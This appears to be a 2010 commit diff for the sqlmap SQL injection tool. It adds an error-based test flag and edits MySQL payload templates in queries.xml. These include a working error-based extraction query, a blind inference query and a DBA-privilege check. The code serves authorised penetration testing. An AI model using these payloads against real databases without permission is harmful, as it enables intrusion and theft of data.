several MySQL fixes/enhancements pointed out by Anton Mogilin

stamparm · stamparm · commit aa931efd4da7 · 2010-10-24T22:05:14.000Z
diff --git a/doc/THANKS b/doc/THANKS
@@ -220,7 +220,7 @@ Enrico Milanese <enricomilanese@gmail.com>
     for providing me with some ideas for the PHP backdoor
 
 Anton Mogilin <azarmaster81@yahoo.com>
-    for reporting a minor bug
+    for reporting couple of bugs
 
 Alejo Murillo Moya <alex@65535.com>
     for suggesting a feature
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
@@ -212,6 +212,10 @@ def cmdLineParser():
                               help="Test for stacked queries (multiple "
                                    "statements) support")
 
+        techniques.add_option("--error-test", dest="errorTest",
+                          action="store_true", default=False,
+                          help="Test for error based SQL injection support (beta)")
+
         techniques.add_option("--time-test", dest="timeTest",
                               action="store_true", default=False,
                               help="Test for time based blind SQL injection")
@@ -492,10 +496,6 @@ def cmdLineParser():
         parser.add_option("--profile", dest="profile", action="store_true",
                           default=False, help=SUPPRESS_HELP)
 
-        parser.add_option("--error-test", dest="errorTest",
-                          action="store_true", default=False,
-                          help=SUPPRESS_HELP)
-
         parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", default=10,
                           help=SUPPRESS_HELP)
 
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
@@ -51,7 +51,7 @@ def errorUse(expression):
         nulledCastedField                = agent.nullAndCastField(fieldToCastStr)
 
         if kb.dbms == "MySQL":
-            nulledCastedField            = nulledCastedField.replace("CHAR(10000)", "CHAR(255)") #fix for that 'Subquery returns more than 1 row'
+            nulledCastedField            = nulledCastedField.replace("AS CHAR)", "AS CHAR(255))") #fix for that 'Subquery returns more than 1 row'
 
         expressionReplaced               = expression.replace(fieldToCastStr, nulledCastedField, 1)
         expressionUnescaped              = unescaper.unescape(expressionReplaced)
diff --git a/xml/queries.xml b/xml/queries.xml
@@ -3,7 +3,7 @@
 <root>
     <!-- MySQL -->
     <dbms value="MySQL">
-        <cast query="CAST(%s AS CHAR(10000))"/>
+        <cast query="CAST(%s AS CHAR)"/>
         <length query="LENGTH(%s)"/>
         <isnull query="IFNULL(%s, ' ')"/>
         <delimiter query=","/>
@@ -26,9 +26,9 @@
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
         <error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
         <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
-        <banner query="SELECT VERSION()"/>
-        <current_user query="SELECT CURRENT_USER()"/>
-        <current_db query="SELECT DATABASE()"/>
+        <banner query="VERSION()"/>
+        <current_user query="CURRENT_USER()"/>
+        <current_db query="DATABASE()"/>
         <is_dba query="(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y'"/>
         <check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0, 1)='%s'"/>
         <users>
